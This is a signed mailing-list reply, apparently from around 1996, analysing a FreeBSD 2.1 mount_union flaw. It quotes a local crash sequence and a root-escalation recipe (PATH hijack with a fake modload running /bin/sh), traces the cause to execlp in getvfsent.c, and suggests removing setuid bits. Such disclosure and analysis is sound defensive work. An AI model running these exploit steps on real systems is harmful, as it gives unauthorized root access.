-----BEGIN PGP SIGNED MESSAGE----- > FreeBSD has a security hole... > dangerous is mount_union if suid is set > vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT > probably FreeBSD 2.1 STABLE is not vulnerable > to crash system (as a normal user) try this: > mkdir a > mkdir b > mount_union ~/a ~/b > mount_union -b ~/a ~/b Hmm.... Needless to say, I've done a "chmod a-s /sbin/mount*" on all of the FreeBSD machines I operate (all are 2.1.0-RELEASE with minor changes). Ordinary users shouldn't be allowed to mount anything, anyway. > to got euid try this: > export PATH=/tmp:$PATH #if zsh, of course > echo /bin/sh >/tmp/modload > chmod +x /tmp/modload > mount_union /dir1 /dir2 > and You are root! Obviously, mount_union is depending on modload being on the $PATH, rather than using "/sbin/modload". It seems this is not a bug in mount_union itself, but in getvfsent.c... /usr/src/lib/libc/gen/getvfsent.c: [deletia] snprintf(name_mod, sizeof name_mod, "%s%s", name, "_mod"); status = execlp("modload", "modload", "-e", name_mod, "-o", name_mod, "-u", "-q", path, (const char *)0); exit(status ? errno : 0); } [EOF] Clearly, execlp() should be calling modload as "/sbin/modload" instead. Because this is a bug in getvfsent.c and not mount_union, it's possible that other mount_* commands would have the same hole if suid root. chmod a-s /sbin/mount* ===================================================================== | Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) | | Email: steve@edmweb.com Home Page: http://www.edmweb.com/steve/ | | PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 | | -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. -- | ===================================================================:) -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQEVAwUBMZ0AvNtVWdufMXJpAQGuJwf/eJsi8NIJ7FA0v/9aG7iv/8aW7q2KT97s zAvB744ziEpKniiPMRTfI2rhSA+a2ZjxlE4d5k1j6KfTBnEy2HICanWknvfZO7xI jjDLTooQ+rQHeSyGpVXBmAxsb3/n9AgNIsQ6zPPZGEUiO6wsGxt1v+SIlTdBN+Ea mHztl9vIX9JLbki8+Dv5fcmSSPTVkO1CKchP2NBEPUMUSLBkeco7QpJQwZd4g6n3 cRK9S5zXoVVSW56BHXew6WWzk8Ni/lxFlz0OcMBEpelXCY6HP1EHgSTfaJ2JEB/c MMkNaBwLSOjAlW7x/ZA66AarW64GXMBf2Jot28knfL4j+kPoJyEMPA== =m7Wb -----END PGP SIGNATURE-----